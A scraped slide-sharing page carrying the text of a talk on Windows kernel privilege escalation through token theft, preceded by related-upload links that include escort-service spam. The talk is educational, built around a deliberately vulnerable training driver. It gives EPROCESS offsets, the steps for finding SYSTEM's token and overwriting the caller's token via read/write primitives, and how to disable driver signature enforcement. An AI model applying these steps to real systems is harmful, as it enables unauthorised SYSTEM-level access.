Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfPower Karaoke
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
software engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxsoftware engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxnada99848
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesPhilip Schwarz
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
 

Recently uploaded (20)

Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdf
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
software engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptxsoftware engineering Chapter 5 System modeling.pptx
software engineering Chapter 5 System modeling.pptx
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 

0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft

  • 1. Windows Privilege Escalation Russell Sanford xort @ sploit.online A Low-Level Explanation of Token Theft
  • 2. What Were Covering: • KPRCB structure • ETHREAD structure • EPROCESS structures • ActiveProcessLinks • Locating SYSTEM’s EPROCESS structure from Userland • Stealing SYSTEM’s TOKEN and patching them over our process’ EPROCESS for Priv Esc • Read / Write Primitives Extra Fun - Interactive Learning Exploit! • DHA_Vuln_Driver_RW_Primitive.sys • DHA_Userland_Exploit_PEEKPOKE.exe • DHA_Userland_Find_SYSTEM_EPROCESS.exe • DHA_PrivEsc_Demo.py Windows Privilege Escalation Token Theft @ A Low-Level WOOHOO!
  • 3. Goals of this presentation • Explain how Token Theft Privilege Escalation Work • Explain what Read-What-Where and Write-What-Where primitives are • Provide you with a simplified vulnerable target driver and tool to exploit the driver to practice with • Walk through exploiting our demo kernel vulnerability Windows Privilege Escalation Token Theft @ A Low-Level
  • 4. Before we start… A quick note on pointers and memory addressing Windows Privilege Escalation Token Theft @ A Low-Level
  • 5. Windows Privilege Escalation Token Theft @ A Low-Level What's this ‘pointer’ you speak of? A pointer is a variable that stores the address of another variable. Its an address stored at an address that points to somewhere else. In the example above, the POINTER located at address 0x7fff98b499e8 POINTS to address 0x7fffa0757dd4 which is where the Variable with the value “10” is located.
  • 6. Setup : The Code Windows Privilege Escalation Token Theft @ A Low-Level
  • 7. Setup : The Code • I’ve provided compiled versions of the kernel driver, the executables used to exploit them, and scripted exploit. Compiled Binaries and Source Codes: http://sploit.online/0x2_KernelTalks_TokenTheftPrivEsc/ • If you don’t trust the code – or just wish to analyze it – the source has been provided as well. • To compile the code, you will need Visual Studio as well as the Windows SDK and WDK. Instructions for installing these prerequisites can all be found here: https://learn.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk Windows Privilege Escalation Token Theft @ A Low-Level
  • 8. Windows Privilege Escalation Token Theft @ A Low-Level 1 2 3 Setup : Loading the DHA_VulnDriver with OSR Driver Loader 1) Select BROWSE to select the Driver 2) Select Register Service ( All Windows Drivers must have a entry in the Registry in order to load ) 3) Select Start Service * ALTERNATIVELY, you could use an unsigned driver loader like KDU :D :D
  • 9. Windows Privilege Escalation Token Theft @ A Low-Level + SHIFT Press F7 Select Startup Settings Select Restart In order to load The vulnerable Driver, you must first Disable Driver Signature Enforcement! 1 2 3 4 SETUP: DISABLE DRIVER SIGNING
  • 10. Windows Internal Structures for Process Management Windows Privilege Escalation Token Theft @ A Low-Level
  • 11. Windows Internals: KPRCB structure The name KPRCB stands for (Kernel) Processor Control Block. The kernel keeps one for each logical processor as the last member of the processor’s KPCR. The KPRCB (formally _KPRCB) holds most of what the kernel needs ready access to while managing a processor and while managing resources that are themselves managed more simply and quickly per processor. The KPRCB structure’s CurrentThread pointer connects the structure to a _ETHREAD structure…. Windows Privilege Escalation Token Theft @ A Low-Level
  • 12. Windows Internals: ETHREAD structure • The ETHREAD structure is the kernel’s representation of a thread object. • In the Windows Kernel it is accessed by referencing GS:0x188 • When writing Kernel Shellcode, this is the easiest entry point path to work your way to the EPROCESS list of linked structures <----- %gs:0x188 ( in assembly points here) Windows Privilege Escalation Token Theft @ A Low-Level
  • 13. Windows Internals: EPROCESS structures Windows Privilege Escalation Token Theft @ A Low-Level • The EPROCESS structure is the kernel's representation of a process object. • Each running process has an associated EPROCESS structure that Windows Uses to keep track of it with.
  • 14. A look inside an EPROCESS structure • The Actual structure is 2944 bytes in length and host a vast amount of information describing the running process such as the process’s name, Image Base Address of the loaded binary in Memory and a a whole lot more. • For this Exercise we’ll only be using 3 fields of this Lengthy and detailed structure: 1) UniqueProcessId (PID) 2) ActiveProcessLinks (Links to the next/previous EPROCESS structures) 3) Token (Security Token Assigned to process) 0:027> dt nt!_EPROCESS ntdll!_EPROCESS +0x000 Pcb : _KPROCESS ... +0x440 UniqueProcessId : Ptr64 Void +0x448 ActiveProcessLinks : _LIST_ENTRY ... +0x4b8 Token : _EX_FAST_REF ... ... +0x5a8 ImageFileName : [15] UChar ... +0xb70 MitigationFlags3Values : <unnamed-tag> 0:024> ?? sizeof(nt!_EPROCESS) unsigned int64 0xb80 Windows Privilege Escalation Token Theft @ A Low-Level
  • 15. Walking EPROCESS structures using ActiveProcessLinks Windows Privilege Escalation Token Theft @ A Low-Level • Each EPROCESS structure contains a LIST_ENTRY substructure which is a pair of pointers known as ActiveProcessLinks • LIST_ENTRY structures are double-linked list that point to a identical structures both preceding/proceeding the current structure
  • 16. Walking EPROCESS structures using ActiveProcessLinks Windows Privilege Escalation Token Theft @ A Low-Level • ActiveProcessLinks (LIST_ENTRY links) allow us to walk through a list of all the system’s EPROCESS structures – each of which representing a running process – in a circular manner – both forwards of backwards
  • 17. Exploit Primitives Windows Privilege Escalation Token Theft @ A Low-Level
  • 18. READ-WHAT-WHERE & WRITE WHAT WHERE Primitives READ-WHAT-WHERE – allows us to specify an address to a function and return the value stored at that location in memory WRITE-WHAT-WHERE – allows us to specify an address in memory along with a value to store at that location in memory * These terms are typically used when referring to kernel land vulnerabilities but also can be used in describing userland bugs Windows Privilege Escalation Token Theft @ A Low-Level
  • 19. Data-Driven Attacks Due to VBS, HVCI, CI, DEP, Page Guard, and other mitigations the days of running executable shellcode are largely over with Data-Driven attacks involving modifying Process’ Handles, Structures, and Objects is still fair game. We can utilize Data-Driven Attacks to Escalate Privileges and get executable code to run (example: LOL Driver attacks) Windows Privilege Escalation Token Theft @ A Low-Level
  • 20. Exploitation Tool Windows Privilege Escalation Token Theft @ A Low-Level
  • 21. Windows Privilege Escalation Token Theft @ A Low-Level Keeping it old school - PEEK and POKE 
  • 22. DHA_Userland_Exploit_PEEKPOKE.exe Windows Privilege Escalation Token Theft @ A Low-Level Allows for us to READ or WRITE to R/W Section of memory by offering Read- What-Where and Write- What-Where primitives to conduct Data-Driven attacks against the kernel. Usage: PEEK [address] POKE [address] [write-data] Operates with UINT64 variables
  • 23. The Vulnerable Driver Windows Privilege Escalation Token Theft @ A Low-Level
  • 24. Windows Privilege Escalation Token Theft @ A Low-Level DHA_Vuln_Driver_RW_Primitive.sys BSOD-free kernel fun ! • The vulnerable driver was compiled with Exception Handling to not allow illegal memory access attempts. • Normally, if you tried to access an unallocated, privately mapped, or illegal address you would cause an exception leading to something like…
  • 25. The Privilege Escalation Attack – Step by Step Windows Privilege Escalation Token Theft @ A Low-Level
  • 26. Locating SYSTEM’s EPROCESS structure from Userland DHA_Userland_Find_SYSTEM_EPROCESS.exe explained… (c++) STEP 1: Finding Windows Kernel Base Windows Privilege Escalation Token Theft @ A Low-Level • The EnumDeviceDrivers() function will populate a list of loaded system modules • The first entry [0] contains the loading address of ntosknrl.exe (windows kernel)
  • 27. Locating SYSTEM’s EPROCESS structure from Userland DHA_Userland_Find_SYSTEM_EPROCESS.exe explained… (c++) STEP 2: Finding SYSTEM’s EPROCCESS structure offset Windows Privilege Escalation Token Theft @ A Low-Level • We use LoadLibraryA() to load ntoskrnl.exe (Normally used for DLL’s – but .EXE, .SYS, and .DLL are the same PE file format • We use GetProcAddress() to find the export for PsInitialSystemProcess (EPROCESS pointer offset) ( GetProcAddress() is normally used to look up function addresses – but what it’s ACTUALLY doing is looking up EXPORT names/addresses  ) • We Add Kernelbase + PsInitialSystemProcess together for pointer to EPROCESS in memory
  • 28. Locating SYSTEM’s EPROCESS structure from Userland STEP 1 & 2: Finding SYSTEM’s EPROCCESS structure offset Note: KERNELBASE + OFFSET == POINTER to SYSTEM EPROCESS Structure (#4) STEP3: Resolve the POINTER to SYSTEM’s EPROCESS structure Now we have the location of SYSTEM’s EPROCESS structure and have entered the double-linked list of EPROCESS structures! ADDRESS: 0xffff848b9eafd040 Windows Privilege Escalation Token Theft @ A Low-Level
  • 29. Let’s Verify we have SYSTEM’s EPROCESS structure SYSTEM’s EPROCESS structure ALWAYS has a PID of #4 Windows Privilege Escalation Token Theft @ A Low-Level EPROCESS Structure offsets UniqueProcessId = 0x440 # PVOID ActiveProcessLinks = 0x448 # LIST_ENTRY Token = 0x4b8 # PVOID EPROCESS ADDRESS = 0xffff848b9eafd040 UniqueProcessId = 0x440 0xffff848b9eafd040 + 0x440 = 0xffff848b9eafd480 YEP That’s SYSTEM!
  • 30. Let’s steal SYSTEM’s EPROCESS structure’s security Token ! Windows Privilege Escalation Token Theft @ A Low-Level EPROCESS Structure offsets UniqueProcessId = 0x440 # PVOID ActiveProcessLinks = 0x448 # LIST_ENTRY Token = 0x4b8 # PVOID EPROCESS ADDRESS = 0xffff848b9eafd040 Token = 0x4b8 0xffff848b9eafd040 + 0x440 = 0xffff848b9eafd4f8 SYSTEM_TOKEN = 0xffffbe87f081e62f
  • 31. Let’s adjust our recovered SYSTEM EPROCESS Token for use Windows Privilege Escalation Token Theft @ A Low-Level All Windows internal OBJECTs have an attached ‘Reference Count’ (Ref Cnt) number to keep copies of different instances of use of an object. Were going to remove the Reference Count from the Token for our purposes This simply means removing the lower 3 bits of our recovered token by using a logical AND operation with the value 0xfffffffffffffff8 SYSTEM_TOKEN = 0xFFFFBE87F081E62F (BEFORE) & 0xFFFFFFFFFFFFFFF7 = SYSTEM_TOKEN = 0xFFFFBE87F081E628 (AFTER) * in this instance the lower 0xF (1111) becomes 0x8 (1000)
  • 32. Windows Privilege Escalation Token Theft @ A Low-Level Let’s walk the EPROCESS list’s connecting LIST_ENTRYs Remember, Each Link in a LIST_ENTRY structure just points to the next link (Flink/Blink) 0xffff848b9eb90488 0xffff848b9ebe2488 0xffff848ba0fda488
  • 33. Let’s walk the EPROCESS list’s connecting LIST_ENTRYs to find our process’ PID Windows Privilege Escalation Token Theft @ A Low-Level We Add the ActiveProcessLinks offset of +0x448 to the location address of SYSTEM’s EPROCESS structure and dereference (PEEK) the address there to enter the double linked list The LOOP: We check (PEEK) the value of ADDRESS – 0x8 to see if is equal to our PID If not: we (PEEK) the address of the last address returned to walk the list forward
  • 34. Ounce we find our PID lets copy SYSTEM’s Token over Ours Windows Privilege Escalation Token Theft @ A Low-Level Note: The difference between the UniqueProcessID offset and Token offsets is 0x78 bytes At this location we write our stolen Token using the POKE command supplying the address of our PID’s Token to write to and the SYSTEM Token value
  • 35. Demo Exploit Automating the Attack Windows Privilege Escalation Token Theft @ A Low-Level
  • 36. Windows Privilege Escalation Token Theft @ A Low-Level Demo Exploit Module DHA_PrivEsc_Demo.py
  • 37. Windows Privilege Escalation Token Theft @ A Low-Level
  • 38. Final Notes on Professional Exploitation Windows Privilege Escalation Token Theft @ A Low-Level
  • 39. Windows Privilege Escalation Token Theft @ A Low-Level Final notes on writing Profession Exploits… The EPROESS Structure is what’s known as an “Opaque structure” basically meaning – it’s meant to be internal and is subject to change in it’s layout. The EPROCESS structure has changed many times in the last few versions of windows. Offset changes can be observed in the structure here: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/eprocess/index.htm In writing a professional exploit a exploit author would detect the OS version and adjust to ensure these offsets match the version of the target OS and that the exploit could be versatile if affecting multiple versions of the Operating system
  • 40. Windows Privilege Escalation Token Theft @ A Low-Level Final notes on writing Profession Exploits… To keep some of the math basic I explained to you that PID could be found 8 bytes behind ActiveProcessLink’s LIST_ENTRY structure when walking EPROCESS structures. A more structured exploit would have deducted the length of ActiveProcessLinks from the ActiveProcessLink location to find the actual beginning of the EPROCESS structure then use the offset values from the base of the structure. This is the more elegant approach and makes exploits easier to port to multiple versions of an OS and utilizes offsets more recognizable to other researchers vs our this-8=PID styled tricks used. 
  • 41. Next Talk: Exploiting LOLDriver Vulnerabilities DC214 – 7.13.23 Windows Privilege Escalation Token Theft @ A Low-Level
  • 42. Thanks! Russell Sanford xort@sploit.online Windows Privilege Escalation Token Theft @ A Low-Level